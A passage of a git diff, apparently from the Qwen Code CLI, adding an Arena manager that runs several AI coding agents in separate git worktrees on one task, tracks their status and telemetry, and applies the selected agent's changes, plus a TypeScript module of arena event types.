'discarded', + ); + + // Stop polling in case cleanup is called without cancel + this.stopPolling(); + + // Remove in-process event bridge listeners + this.teardownEventBridge(); + + // Clean up backend resources + if (this.backend) { + await this.backend.cleanup(); + } + + // Clean up worktrees + await this.worktreeService.cleanupSession(this.worktreeDirName!); + + this.agents.clear(); + this.cachedResult = null; + this.sessionId = undefined; + this.worktreeDirName = undefined; + this.arenaConfig = undefined; + this.backend = null; + this.sessionEndedLogged = false; + } + + /** + * Clean up runtime resources (processes, backend, memory) without removing + * worktrees or session files on disk. Used when preserveArtifacts is enabled. + */ + async cleanupRuntime(): Promise { + if (!this.sessionId) { + return; + } + + debugLogger.info( + `Cleaning up Arena runtime (preserving artifacts): ${this.sessionId}`, + ); + + // If no session-ended event was emitted yet, emit before tearing down. + this.emitSessionEnded( + this.sessionStatus === ArenaSessionStatus.CANCELLED + ? 'cancelled' + : 'discarded', + ); + + this.stopPolling(); + + // Remove in-process event bridge listeners + this.teardownEventBridge(); + + if (this.backend) { + await this.backend.cleanup(); + } + + this.agents.clear(); + this.cachedResult = null; + this.sessionId = undefined; + this.worktreeDirName = undefined; + this.arenaConfig = undefined; + this.backend = null; + this.sessionEndedLogged = false; + } + + /** + * Apply the result from a specific agent to the main working directory. + */ + async applyAgentResult( + agentId: string, + ): Promise<{ success: boolean; error?: string }> { + const agent = this.agents.get(agentId); + if (!agent) { + return { success: false, error: `Agent ${agentId} not found` }; + } + + if (!isSuccessStatus(agent.status)) { + return { + success: false, + error: `Agent ${agentId} has not completed (current status: ${agent.status})`, + }; + } + + const applyResult = await this.worktreeService.applyWorktreeChanges( + agent.worktree.path, + ); + + if (applyResult.success) { + this.emitSessionEnded('selected', agent.model.modelId); + } + + return applyResult; + } + + /** + * Get the diff for a specific agent's changes. + */ + async getAgentDiff(agentId: string): Promise { + const agent = this.agents.get(agentId); + if (!agent) { + return `Agent ${agentId} not found`; + } + + return this.worktreeService.getWorktreeDiff(agent.worktree.path); + } + + // ─── Private: Telemetry ─────────────────────────────────────── + + /** + * Emit the `arena_session_ended` telemetry event exactly once. + * + * Called from: + * - start() early-cancel paths → 'cancelled' + * - start() catch block → 'failed' + * - applyAgentResult() on success → 'selected' (with winner) + * - cleanup() / cleanupRuntime() → 'discarded' (user left without picking) + */ + private emitSessionEnded( + status: ArenaSessionEndedStatus, + winnerModelId?: string, + ): void { + if (this.sessionEndedLogged) return; + this.sessionEndedLogged = true; + + const agents = Array.from(this.agents.values()); + logArenaSessionEnded( + this.config, + makeArenaSessionEndedEvent({ + arena_session_id: this.sessionId ?? '', + status, + duration_ms: this.startedAt ? Date.now() - this.startedAt : 0, + display_backend: this.backend?.type, + agent_count: agents.length, + completed_agents: agents.filter( + (a) => a.status === AgentStatus.COMPLETED, + ).length, + failed_agents: agents.filter((a) => a.status === AgentStatus.FAILED) + .length, + cancelled_agents: agents.filter( + (a) => a.status === AgentStatus.CANCELLED, + ).length, + winner_model_id: winnerModelId, + }), + ); + } + + // ─── Private: Progress ───────────────────────────────────────── + + /** + * Emit a progress message via SESSION_UPDATE so the UI can display + * setup status. + */ + private emitProgress( + message: string, + type: 'info' | 'warning' | 'success' = 'info', + ): void { + if (!this.sessionId) return; + this.eventEmitter.emit(ArenaEventType.SESSION_UPDATE, { + sessionId: this.sessionId, + type, + message, + timestamp: Date.now(), + }); + } + + // ─── Private: Validation ─────────────────────────────────────── + + private validateStartOptions(options: ArenaStartOptions): void { + if (!options.models || options.models.length < 2) { + throw new Error('Arena requires at least 2 models to compare'); + } + + if (options.models.length > ARENA_MAX_AGENTS) { + throw new Error(`Arena supports a maximum of ${ARENA_MAX_AGENTS} models`); + } + + if (!options.task || options.task.trim().length === 0) { + throw new Error('Arena requires a task/prompt'); + } + + // Check for duplicate model IDs + const modelIds = options.models.map((m) => m.modelId); + const uniqueIds = new Set(modelIds); + if (uniqueIds.size !== modelIds.length) { + throw new Error('Arena models must have unique identifiers'); + } + + // Check for collisions after filesystem-safe normalization. + // safeAgentId replaces characters like / \ : to '--', so distinct + // model IDs (e.g. "org/model" and "org--model") can map to the same + // status/control file path and corrupt each other's state. + const safeIds = modelIds.map((id) => safeAgentId(id)); + const uniqueSafeIds = new Set(safeIds); + if (uniqueSafeIds.size !== safeIds.length) { + const collisions = modelIds.filter( + (id, i) => safeIds.indexOf(safeIds[i]!) !== i, + ); + throw new Error( + `Arena model IDs collide after path normalization: ${collisions.join(', ')}. ` + + 'Choose model IDs that remain unique when special characters (/ \\ : etc.) are replaced.', + ); + } + } + + // ─── Private: Backend Initialization ─────────────────────────── + + /** + * Initialize the backend. + */ + private async initializeBackend(displayMode?: DisplayMode): Promise { + const { backend, warning } = await detectBackend(displayMode, this.config); + await backend.init(); + this.backend = backend; + + if (warning && this.sessionId) { + this.eventEmitter.emit(ArenaEventType.SESSION_UPDATE, { + sessionId: this.sessionId, + type: 'warning', + message: warning, + timestamp: Date.now(), + }); + } + + // Surface attach hint for external tmux sessions + const attachHint = backend.getAttachHint(); + if (attachHint && this.sessionId) { + this.eventEmitter.emit(ArenaEventType.SESSION_UPDATE, { + sessionId: this.sessionId, + type: 'info', + message: `To view agent panes, run: ${attachHint}`, + timestamp: Date.now(), + }); + } + } + + // ─── Private: Worktree Setup ─────────────────────────────────── + + /** + * Derive a short, filesystem-friendly directory name from the full session ID. + * Uses the first 8 hex characters of the UUID. If that path already exists, + * appends a numeric suffix (-2, -3, …) until an unused name is found. + */ + private async deriveWorktreeDirName(sessionId: string): Promise { + const shortId = sessionId.replaceAll('-', '').slice(0, 8); + let candidate = shortId; + let suffix = 2; + + while (true) { + const candidatePath = path.join(this.arenaBaseDir, candidate); + try { + await fs.access(candidatePath); + candidate = `${shortId}-${suffix}`; + suffix++; + } catch { + return candidate; + } + } + } + + private async setupWorktrees(): Promise { + if (!this.arenaConfig) { + throw new Error('Arena config not initialized'); + } + + debugLogger.info('Setting up worktrees for Arena agents'); + + const worktreeNames = this.arenaConfig.models.map((m) => m.modelId); + + const result = await this.worktreeService.setupWorktrees({ + sessionId: this.worktreeDirName!, + sourceRepoPath: this.arenaConfig.sourceRepoPath, + worktreeNames, + metadata: { arenaSessionId: this.arenaConfig.sessionId }, + }); + + if (!result.success) { + const errorMessages = result.errors + .map((e) => `${e.name}: ${e.error}`) + .join('; '); + throw new Error(`Failed to set up worktrees: ${errorMessages}`); + } + + // Create agent states + for (let i = 0; i < this.arenaConfig.models.length; i++) { + const model = this.arenaConfig.models[i]!; + const worktreeName = worktreeNames[i]!; + const worktree = result.worktreesByName[worktreeName]; + + if (!worktree) { + throw new Error( + `No worktree created for model ${model.modelId} (name: ${worktreeName})`, + ); + } + + const agentId = model.modelId; + + const agentState: ArenaAgentState = { + agentId, + model, + status: AgentStatus.INITIALIZING, + worktree, + abortController: new AbortController(), + agentSessionId: `${this.sessionId}#${agentId}`, + stats: { + rounds: 0, + totalTokens: 0, + inputTokens: 0, + outputTokens: 0, + durationMs: 0, + toolCalls: 0, + successfulToolCalls: 0, + failedToolCalls: 0, + }, + startedAt: 0, + accumulatedText: '', + }; + + this.agents.set(agentId, agentState); + } + + debugLogger.info(`Created ${this.agents.size} agent worktrees`); + } + + // ─── Private: Agent Execution ────────────────────────────────── + + private async runAgents(): Promise { + if (!this.arenaConfig) { + throw new Error('Arena config not initialized'); + } + + debugLogger.info('Starting Arena agents sequentially via backend'); + + const backend = this.requireBackend(); + + // Wire up exit handler on the backend + backend.setOnAgentExit((agentId, exitCode, signal) => { + this.handleAgentExit(agentId, exitCode, signal); + }); + + const isInProcess = backend.type === DISPLAY_MODE.IN_PROCESS; + + // Spawn agents sequentially — each spawn completes before starting the next. + // This creates a visual effect where panes appear one by one. + for (const agent of this.agents.values()) { + await this.spawnAgentPty(agent); + } + + this.emitProgress('All agents are now live and working on the task.'); + + // For in-process mode, set up event bridges instead of file-based polling. + // For PTY mode, start polling agent status files. + if (isInProcess) { + this.setupInProcessEventBridge(backend as InProcessBackend); + } else { + this.startPolling(); + } + + // Set up timeout + const timeoutSeconds = this.arenaConfig.timeoutSeconds; + + // Wait for all agents to reach IDLE or TERMINATED, or timeout. + // Unlike waitForAll (which waits for PTY exit), this resolves as soon + // as every agent has finished its first task in interactive mode. + const allSettled = await this.waitForAllAgentsSettled( + timeoutSeconds ? timeoutSeconds * 1000 : undefined, + ); + + // Stop polling when all agents are done (no-op for in-process mode) + if (!isInProcess) { + this.stopPolling(); + } + + if (!allSettled) { + debugLogger.info('Arena session timed out, stopping remaining agents'); + this.sessionStatus = ArenaSessionStatus.CANCELLED; + + // Terminate remaining active agents + for (const agent of this.agents.values()) { + if (!isTerminalStatus(agent.status)) { + backend.stopAgent(agent.agentId); + agent.abortController.abort(); + agent.stats.durationMs = Date.now() - agent.startedAt; + this.updateAgentStatus(agent.agentId, AgentStatus.CANCELLED); + } + } + } + + debugLogger.info('All Arena agents settled or timed out'); + } + + private async spawnAgentPty(agent: ArenaAgentState): Promise { + if (!this.arenaConfig) { + return; + } + + const backend = this.requireBackend(); + + const { agentId, model, worktree } = agent; + + debugLogger.info(`Spawning agent PTY: ${agentId}`); + + agent.startedAt = Date.now(); + this.updateAgentStatus(agentId, AgentStatus.RUNNING); + + // Emit agent start event + this.eventEmitter.emit(ArenaEventType.AGENT_START, { + sessionId: this.arenaConfig.sessionId, + agentId, + model, + worktreePath: worktree.path, + timestamp: Date.now(), + }); + + this.callbacks.onAgentStart?.(agentId, model); + + // Build the CLI command to spawn the agent as a full interactive instance + const spawnConfig = this.buildAgentSpawnConfig(agent); + + try { + await backend.spawnAgent(spawnConfig); + } catch (error) { + const errorMessage = + error instanceof Error ? error.message : String(error); + agent.error = errorMessage; + this.updateAgentStatus(agentId, AgentStatus.FAILED); + + this.eventEmitter.emit(ArenaEventType.AGENT_ERROR, { + sessionId: this.requireConfig().sessionId, + agentId, + error: errorMessage, + timestamp: Date.now(), + }); + + debugLogger.error(`Failed to spawn agent: ${agentId}`, error); + } + } + + private requireBackend(): Backend { + if (!this.backend) { + throw new Error('Arena backend not initialized.'); + } + return this.backend; + } + + private requireConfig(): ArenaConfig { + if (!this.arenaConfig) { + throw new Error('Arena config not initialized'); + } + return this.arenaConfig; + } + + private handleAgentExit( + agentId: string, + exitCode: number | null, + _signal: number | null, + ): void { + const agent = this.agents.get(agentId); + if (!agent) { + return; + } + + // Already failed/cancelled (e.g. via cancel) + if (isTerminalStatus(agent.status)) { + return; + } + + agent.stats.durationMs = Date.now() - agent.startedAt; + + if ( + exitCode !== 0 && + exitCode !== null && + !agent.abortController.signal.aborted + ) { + agent.error = `Process exited with code ${exitCode}`; + this.eventEmitter.emit(ArenaEventType.AGENT_ERROR, { + sessionId: this.requireConfig().sessionId, + agentId, + error: agent.error, + timestamp: Date.now(), + }); + } + + this.updateAgentStatus( + agentId, + agent.abortController.signal.aborted + ? AgentStatus.CANCELLED + : AgentStatus.FAILED, + ); + debugLogger.info(`Agent exited: ${agentId} (exit code: ${exitCode})`); + } + + /** + * Build the spawn configuration for an agent subprocess. + * + * The agent is launched as a full interactive CLI instance, running in + * its own worktree with the specified model. The task is passed via + * the --prompt argument so the CLI enters interactive mode and + * immediately starts working on the task. + */ + private buildAgentSpawnConfig(agent: ArenaAgentState): AgentSpawnConfig { + const { agentId, model, worktree } = agent; + + // Build CLI args for spawning an interactive agent. + // Note: --cwd is NOT a valid CLI flag; the working directory is set + // via AgentSpawnConfig.cwd which becomes the PTY's cwd. + const args: string[] = []; + + // Set the model and auth type + args.push('--model', model.modelId); + args.push('--auth-type', model.authType); + + // Pass the task via --prompt-interactive (-i) so the CLI enters + // interactive mode AND immediately starts working on the task. + // (--prompt runs non-interactively and would exit after completion.) + if (this.arenaConfig?.task) { + args.push('--prompt-interactive', this.arenaConfig.task); + } + + // Set approval mode if specified + if (this.arenaConfig?.approvalMode) { + args.push('--approval-mode', this.arenaConfig.approvalMode); + } + + // Pass the agent's session ID so the child CLI uses it for telemetry + // correlation instead of generating a random UUID. + args.push('--session-id', agent.agentSessionId); + + // Construct env vars for the agent + const arenaSessionDir = this.getArenaSessionDir(); + const env: Record = { + QWEN_CODE: '1', + ARENA_AGENT_ID: agentId, + ARENA_SESSION_ID: this.arenaConfig?.sessionId ?? '', + ARENA_SESSION_DIR: arenaSessionDir, + }; + + // If the model has auth overrides, pass them via env + if (model.apiKey) { + env['QWEN_API_KEY'] = model.apiKey; + } + if (model.baseUrl) { + env['QWEN_BASE_URL'] = model.baseUrl; + } + + const spawnConfig: AgentSpawnConfig = { + agentId, + command: process.execPath, // Use the same Node.js binary + args: [path.resolve(process.argv[1]!), ...args], // Re-launch the CLI entry point (must be absolute path since cwd changes) + cwd: worktree.path, + env, + cols: this.terminalCols, + rows: this.terminalRows, + inProcess: { + agentName: model.modelId, + initialTask: this.arenaConfig?.task, + runtimeConfig: { + promptConfig: { + systemPrompt: getCoreSystemPrompt( + this.config.getUserMemory(), + model.modelId, + ), + }, + modelConfig: { model: model.modelId }, + runConfig: { + max_turns: this.arenaConfig?.maxRoundsPerAgent, + max_time_minutes: this.arenaConfig?.timeoutSeconds + ? Math.ceil(this.arenaConfig.timeoutSeconds / 60) + : undefined, + }, + }, + authOverrides: { + authType: model.authType, + apiKey: model.apiKey, + baseUrl: model.baseUrl, + }, + chatHistory: this.arenaConfig?.chatHistory, + }, + }; + + debugLogger.info( + `[buildAgentSpawnConfig] agentId=${agentId}, command=${spawnConfig.command}, cliEntry=${process.argv[1]}, resolvedEntry=${path.resolve(process.argv[1]!)}`, + ); + debugLogger.info( + `[buildAgentSpawnConfig] args=${JSON.stringify(spawnConfig.args)}`, + ); + debugLogger.info( + `[buildAgentSpawnConfig] cwd=${spawnConfig.cwd}, env keys=${Object.keys(env).join(',')}`, + ); + + return spawnConfig; + } + + // ─── Private: Status & Results ───────────────────────────────── + + /** Decide whether a status transition is valid. Returns the new status or null. */ + private resolveTransition( + current: AgentStatus, + incoming: AgentStatus, + ): AgentStatus | null { + if (current === incoming) return null; + if (isTerminalStatus(current)) { + // Allow revival: COMPLETED → RUNNING (agent received new input) + if ( + current === AgentStatus.COMPLETED && + incoming === AgentStatus.RUNNING + ) { + return incoming; + } + return null; + } + return incoming; + } + + private updateAgentStatus( + agentId: string, + newStatus: AgentStatus, + options?: { roundCancelledByUser?: boolean }, + ): void { + const agent = this.agents.get(agentId); + if (!agent) { + return; + } + + const previousStatus = agent.status; + agent.status = newStatus; + + this.eventEmitter.emit(ArenaEventType.AGENT_STATUS_CHANGE, { + sessionId: this.requireConfig().sessionId, + agentId, + previousStatus, + newStatus, + timestamp: Date.now(), + }); + + const label = agent.model.modelId; + + // Emit a success message when an agent finishes its initial task. + if ( + this.sessionStatus === ArenaSessionStatus.RUNNING && + previousStatus === AgentStatus.RUNNING && + newStatus === AgentStatus.IDLE + ) { + if (options?.roundCancelledByUser) { + this.emitProgress(`Agent ${label} is cancelled by user.`, 'warning'); + } else { + this.emitProgress(`Agent ${label} finished initial task.`, 'success'); + } + } + + // Emit progress messages for follow-up transitions (only after + // the initial task — the session is IDLE once all agents first settle). + if (this.sessionStatus === ArenaSessionStatus.IDLE) { + if ( + previousStatus === AgentStatus.IDLE && + newStatus === AgentStatus.RUNNING + ) { + this.emitProgress(`Agent ${label} is working on a follow-up task…`); + } else if ( + previousStatus === AgentStatus.RUNNING && + newStatus === AgentStatus.IDLE + ) { + if (options?.roundCancelledByUser) { + this.emitProgress(`Agent ${label} is cancelled by user.`, 'warning'); + } else { + this.emitProgress( + `Agent ${label} finished follow-up task.`, + 'success', + ); + } + } + } + + // Emit AGENT_COMPLETE when agent reaches a terminal status + if (isTerminalStatus(newStatus)) { + const result = this.buildAgentResult(agent); + + this.eventEmitter.emit(ArenaEventType.AGENT_COMPLETE, { + sessionId: this.requireConfig().sessionId, + agentId, + result, + timestamp: Date.now(), + }); + + // Log arena agent completed telemetry + const agentTelemetryStatus = + newStatus === AgentStatus.COMPLETED + ? ('completed' as const) + : newStatus === AgentStatus.FAILED + ? ('failed' as const) + : ('cancelled' as const); + logArenaAgentCompleted( + this.config, + makeArenaAgentCompletedEvent({ + arena_session_id: this.sessionId ?? '', + agent_session_id: agent.agentSessionId, + agent_model_id: agent.model.modelId, + status: agentTelemetryStatus, + duration_ms: agent.stats.durationMs, + rounds: agent.stats.rounds, + total_tokens: agent.stats.totalTokens, + input_tokens: agent.stats.inputTokens, + output_tokens: agent.stats.outputTokens, + tool_calls: agent.stats.toolCalls, + successful_tool_calls: agent.stats.successfulToolCalls, + failed_tool_calls: agent.stats.failedToolCalls, + }), + ); + + this.callbacks.onAgentComplete?.(result); + } + } + + private buildAgentResult(agent: ArenaAgentState): ArenaAgentResult { + return { + agentId: agent.agentId, + model: agent.model, + status: agent.status, + worktree: agent.worktree, + finalText: agent.accumulatedText || undefined, + error: agent.error, + stats: { ...agent.stats }, + startedAt: agent.startedAt, + endedAt: Date.now(), + }; + } + + // ─── Arena Session Directory ────────────────────────────────── + + /** + * Get the arena session directory for the current session. + * All status and control files are stored here. + * + * Returns the absolute path to the session directory, e.g. + * `~/.qwen/worktrees//`. The directory contains: + * - `config.json` — consolidated session config + per-agent status + * - `agents/.json` — individual agent status files + * - `control/` — control signals (shutdown, cancel) + */ + getArenaSessionDir(): string { + if (!this.arenaConfig) { + throw new Error('Arena config not initialized'); + } + return GitWorktreeService.getSessionDir( + this.worktreeDirName!, + this.arenaBaseDir, + ); + } + + // ─── Private: Polling & Control Signals ────────────────────── + + /** + * Wait for all agents to reach IDLE or TERMINATED state. + * Returns true if all agents settled, false if timeout was reached. + */ + private waitForAllAgentsSettled(timeoutMs?: number): Promise { + return new Promise((resolve) => { + const checkSettled = () => { + for (const agent of this.agents.values()) { + if (!isSettledStatus(agent.status)) { + return false; + } + } + return true; + }; + + if (checkSettled()) { + resolve(true); + return; + } + + let timeoutHandle: ReturnType | undefined; + if (timeoutMs !== undefined) { + timeoutHandle = setTimeout(() => { + clearInterval(pollHandle); + resolve(false); + }, timeoutMs); + } + + // Re-check periodically (piggybacks on the same polling interval) + const pollHandle = setInterval(() => { + if (checkSettled()) { + clearInterval(pollHandle); + if (timeoutHandle) clearTimeout(timeoutHandle); + resolve(true); + } + }, ARENA_POLL_INTERVAL_MS); + }); + } + + /** + * Start polling agent status files at a fixed interval. + */ + private startPolling(): void { + if (this.pollingInterval) { + return; + } + + this.pollingInterval = setInterval(() => { + this.pollAgentStatuses().catch((error) => { + debugLogger.error('Error polling agent statuses:', error); + }); + }, ARENA_POLL_INTERVAL_MS); + } + + /** + * Stop the polling interval. + */ + private stopPolling(): void { + if (this.pollingInterval) { + clearInterval(this.pollingInterval); + this.pollingInterval = null; + } + } + + /** + * Set up event bridges for in-process agents. + * Subscribes to each AgentInteractive's events to update ArenaManager state. + * Listeners are tracked in `eventBridgeCleanups` for teardown. + */ + private setupInProcessEventBridge(backend: InProcessBackend): void { + for (const agent of this.agents.values()) { + const interactive = backend.getAgent(agent.agentId); + if (!interactive) continue; + + const emitter = interactive.getEventEmitter(); + if (!emitter) continue; + + // AgentInteractive emits canonical AgentStatus values — no mapping needed. + + const syncStats = () => { + const { totalToolCalls, totalDurationMs, ...rest } = + interactive.getStats(); + Object.assign(agent.stats, rest, { + toolCalls: totalToolCalls, + durationMs: totalDurationMs, + }); + }; + + agent.syncStats = syncStats; + + const applyStatus = ( + incoming: AgentStatus, + options?: { roundCancelledByUser?: boolean }, + ) => { + const resolved = this.resolveTransition(agent.status, incoming); + if (!resolved) return; + if (resolved === AgentStatus.FAILED) { + agent.error = + interactive.getLastRoundError() || interactive.getError(); + } + if (isSettledStatus(resolved)) { + agent.stats.durationMs = Date.now() - agent.startedAt; + } + this.updateAgentStatus(agent.agentId, resolved, options); + }; + + // Sync stats before mapping so counters are up-to-date even when + // the provider omits usage_metadata events. + const onStatusChange = (event: AgentStatusChangeEvent) => { + syncStats(); + applyStatus(event.newStatus, { + roundCancelledByUser: event.roundCancelledByUser, + }); + // Write status files so external consumers get a consistent + // file-based view regardless of backend mode. + this.flushInProcessStatusFiles().catch((err) => + debugLogger.error('Failed to flush in-process status files:', err), + ); + }; + + const onUsageMetadata = () => { + syncStats(); + this.flushInProcessStatusFiles().catch((err) => + debugLogger.error('Failed to flush in-process status files:', err), + ); + }; + + emitter.on(AgentEventType.STATUS_CHANGE, onStatusChange); + emitter.on(AgentEventType.USAGE_METADATA, onUsageMetadata); + + // Store cleanup functions so listeners can be removed during teardown + this.eventBridgeCleanups.push(() => { + emitter.off(AgentEventType.STATUS_CHANGE, onStatusChange); + emitter.off(AgentEventType.USAGE_METADATA, onUsageMetadata); + }); + + // Reconcile: if the agent already transitioned before the bridge was + // attached (e.g. fast completion or createChat failure during spawn), + // backfill stats and apply its current status now so + // waitForAllAgentsSettled sees it. + syncStats(); + applyStatus(interactive.getStatus()); + } + + // Flush status files once after reconciliation so that agents which + // already settled before the bridge was attached still get written to disk. + this.flushInProcessStatusFiles().catch((err) => + debugLogger.error('Failed to flush in-process status files:', err), + ); + } + + /** + * Remove all event bridge listeners registered by setupInProcessEventBridge. + */ + private teardownEventBridge(): void { + for (const cleanup of this.eventBridgeCleanups) { + cleanup(); + } + this.eventBridgeCleanups.length = 0; + } + + /** + * Read per-agent status files from `/agents/` directory. + * Updates agent stats, emits AGENT_STATS_UPDATE events, and writes a + * consolidated `status.json` at the arena session root. + */ + private async pollAgentStatuses(): Promise { + const sessionDir = this.getArenaSessionDir(); + const agentsDir = path.join(sessionDir, 'agents'); + const consolidatedAgents: Record = {}; + + for (const agent of this.agents.values()) { + // Only poll agents that are actively working + if ( + isSettledStatus(agent.status) || + agent.status === AgentStatus.INITIALIZING + ) { + continue; + } + + try { + const statusPath = path.join( + agentsDir, + `${safeAgentId(agent.agentId)}.json`, + ); + const content = await fs.readFile(statusPath, 'utf-8'); + const statusFile = JSON.parse(content) as ArenaStatusFile; + + // Collect for consolidated file + consolidatedAgents[agent.agentId] = statusFile; + + // Update agent stats from the status file. + agent.stats = { + ...agent.stats, + ...statusFile.stats, + }; + + // Detect state transitions from the sideband status file + const resolved = this.resolveTransition( + agent.status, + statusFile.status, + ); + if (resolved) { + if (resolved === AgentStatus.FAILED && statusFile.error) { + agent.error = statusFile.error; + } + this.updateAgentStatus(agent.agentId, resolved); + } + + this.callbacks.onAgentStatsUpdate?.(agent.agentId, statusFile.stats); + } catch (error: unknown) { + // File may not exist yet (agent hasn't written first status) + if (isNodeError(error) && error.code === 'ENOENT') { + continue; + } + debugLogger.error( + `Error reading status for agent ${agent.agentId}:`, + error, + ); + } + } + + // Write consolidated status.json at the arena session root + if (Object.keys(consolidatedAgents).length > 0) { + await this.writeConsolidatedStatus(consolidatedAgents); + } + } + + /** + * Merge agent status data into the arena session's config.json. + * Reads the existing config, adds/updates `updatedAt` and `agents`, + * then writes back atomically (temp file → rename). + */ + private async writeConsolidatedStatus( + agents: Record, + ): Promise { + const sessionDir = this.getArenaSessionDir(); + const configPath = path.join(sessionDir, 'config.json'); + + try { + // Read existing config.json written by GitWorktreeService + let config: ArenaConfigFile; + try { + const content = await fs.readFile(configPath, 'utf-8'); + config = JSON.parse(content) as ArenaConfigFile; + } catch { + // If config.json doesn't exist yet, create a minimal one + const arenaConfig = this.requireConfig(); + config = { + arenaSessionId: arenaConfig.sessionId, + sourceRepoPath: arenaConfig.sourceRepoPath, + worktreeNames: arenaConfig.models.map( + (m) => m.displayName || m.modelId, + ), + createdAt: this.startedAt!, + }; + } + + // Merge in the agent status data + config.updatedAt = Date.now(); + config.agents = agents; + + await atomicWriteJSON(configPath, config); + } catch (error) { + debugLogger.error( + 'Failed to write consolidated status to config.json:', + error, + ); + } + } + + /** + * Build an ArenaStatusFile snapshot from in-memory agent state. + */ + private buildStatusFile(agent: ArenaAgentState): ArenaStatusFile { + return { + agentId: agent.agentId, + status: agent.status, + updatedAt: Date.now(), + rounds: agent.stats.rounds, + stats: { ...agent.stats }, + finalSummary: null, + error: agent.error ?? null, + }; + } + + /** + * Write status files for all in-process agents and update the + * consolidated config.json. + * + * In PTY mode these files are written by ArenaAgentClient inside each + * child process. In in-process mode there is no child process, so the + * ArenaManager writes them directly so that external consumers + * (e.g. an orchestrating agent) get a consistent file-based view + * regardless of backend. + */ + private async flushInProcessStatusFiles(): Promise { + const sessionDir = this.getArenaSessionDir(); + const agentsDir = path.join(sessionDir, 'agents'); + await fs.mkdir(agentsDir, { recursive: true }); + + const consolidatedAgents: Record = {}; + + for (const agent of this.agents.values()) { + const statusFile = this.buildStatusFile(agent); + const filePath = path.join( + agentsDir, + `${safeAgentId(agent.agentId)}.json`, + ); + await atomicWriteJSON(filePath, statusFile); + consolidatedAgents[agent.agentId] = statusFile; + } + + if (Object.keys(consolidatedAgents).length > 0) { + await this.writeConsolidatedStatus(consolidatedAgents); + } + } + + /** + * Write a control signal to the arena session's control/ directory. + * The child agent consumes (reads + deletes) this file. + */ + async sendControlSignal( + agentId: string, + type: ArenaControlSignal['type'], + reason: string, + ): Promise { + const agent = this.agents.get(agentId); + if (!agent) { + debugLogger.error( + `Cannot send control signal: agent ${agentId} not found`, + ); + return; + } + + const controlSignal: ArenaControlSignal = { + type, + reason, + timestamp: Date.now(), + }; + + const sessionDir = this.getArenaSessionDir(); + const controlDir = path.join(sessionDir, 'control'); + const controlPath = path.join(controlDir, `${safeAgentId(agentId)}.json`); + + try { + await fs.mkdir(controlDir, { recursive: true }); + await fs.writeFile( + controlPath, + JSON.stringify(controlSignal, null, 2), + 'utf-8', + ); + debugLogger.info( + `Sent ${type} control signal to agent ${agentId}: ${reason}`, + ); + } catch (error) { + debugLogger.error( + `Failed to send control signal to agent ${agentId}:`, + error, + ); + } + } + + private async collectResults(): Promise { + if (!this.arenaConfig) { + throw new Error('Arena config not initialized'); + } + + const agents: ArenaAgentResult[] = []; + + for (const agent of this.agents.values()) { + const result = this.buildAgentResult(agent); + + // Get diff for agents that finished their task (IDLE or COMPLETED) + if (isSuccessStatus(agent.status)) { + try { + result.diff = await this.worktreeService.getWorktreeDiff( + agent.worktree.path, + ); + } catch (error) { + debugLogger.error( + `Failed to get diff for agent ${agent.agentId}:`, + error, + ); + } + } + + agents.push(result); + } + + const endedAt = Date.now(); + + return { + sessionId: this.arenaConfig.sessionId, + task: this.arenaConfig.task, + status: this.sessionStatus, + agents, + startedAt: this.startedAt!, + endedAt, + totalDurationMs: endedAt - this.startedAt!, + wasRepoInitialized: false, + }; + } +} diff --git a/packages/core/src/agents/arena/arena-events.ts b/packages/core/src/agents/arena/arena-events.ts new file mode 100644 index 000000000..def7c2444 --- /dev/null +++ b/packages/core/src/agents/arena/arena-events.ts @@ -0,0 +1,184 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { EventEmitter } from 'events'; +import type { + ArenaModelConfig, + ArenaAgentResult, + ArenaSessionResult, +} from './types.js'; +import type { AgentStatus } from '../runtime/agent-types.js'; + +/** + * Arena event types. + */ +export enum ArenaEventType { + /** Arena session started */ + SESSION_START = 'session_start', + /** Informational or warning update during session lifecycle */ + SESSION_UPDATE = 'session_update', + /** Arena session completed */ + SESSION_COMPLETE = 'session_complete', + /** Arena session failed */ + SESSION_ERROR = 'session_error', + /** Agent started */ + AGENT_START = 'agent_start', + /** Agent status changed */ + AGENT_STATUS_CHANGE = 'agent_status_change', + /** Agent completed */ + AGENT_COMPLETE = 'agent_complete', + /** Agent error */ + AGENT_ERROR = 'agent_error', +} + +export type ArenaEvent = + | 'session_start' + | 'session_update' + | 'session_complete' + | 'session_error' + | 'agent_start' + | 'agent_status_change' + | 'agent_complete' + | 'agent_error'; + +/** + * Event payload for session start. + */ +export interface ArenaSessionStartEvent { + sessionId: string; + task: string; + models: ArenaModelConfig[]; + timestamp: number; +} + +/** + * Event payload for session complete. + */ +export interface ArenaSessionCompleteEvent { + sessionId: string; + result: ArenaSessionResult; + timestamp: number; +} + +/** + * Event payload for session error. + */ +export interface ArenaSessionErrorEvent { + sessionId: string; + error: string; + timestamp: number; +} + +/** + * Event payload for agent start. + */ +export interface ArenaAgentStartEvent { + sessionId: string; + agentId: string; + model: ArenaModelConfig; + worktreePath: string; + timestamp: number; +} + +/** + * Event payload for agent error. + */ +export interface ArenaAgentErrorEvent { + sessionId: string; + agentId: string; + error: string; + timestamp: number; +} + +/** + * Event payload for agent complete. + */ +export interface ArenaAgentCompleteEvent { + sessionId: string; + agentId: string; + result: ArenaAgentResult; + timestamp: number; +} + +/** + * Event payload for agent status change. + */ +export interface ArenaAgentStatusChangeEvent { + sessionId: string; + agentId: string; + previousStatus: AgentStatus; + newStatus: AgentStatus; + timestamp: number; +} + +/** + * Event payload for session update (informational or warning). + */ +export type ArenaSessionUpdateType = 'info' | 'warning' | 'success'; + +export interface ArenaSessionUpdateEvent { + sessionId: string; + type: ArenaSessionUpdateType; + message: string; + timestamp: number; +} + +/** + * Type map for arena events. + */ +export interface ArenaEventMap { + [ArenaEventType.SESSION_START]: ArenaSessionStartEvent; + [ArenaEventType.SESSION_UPDATE]: ArenaSessionUpdateEvent; + [ArenaEventType.SESSION_COMPLETE]: ArenaSessionCompleteEvent; + [ArenaEventType.SESSION_ERROR]: ArenaSessionErrorEvent; + [ArenaEventType.AGENT_START]: ArenaAgentStartEvent; + [ArenaEventType.AGENT_STATUS_CHANGE]: ArenaAgentStatusChangeEvent; + [ArenaEventType.AGENT_COMPLETE]: ArenaAgentCompleteEvent; + [ArenaEventType.AGENT_ERROR]: ArenaAgentErrorEvent; +} + +/** + * Event emitter for Arena events. + */ +export class ArenaEventEmitter { + private ee = new EventEmitter(); + + on( + event: E, + listener: (payload: ArenaEventMap[E]) => void, + ): void { + this.ee.on(event, listener as (...args: unknown[]) => void); + 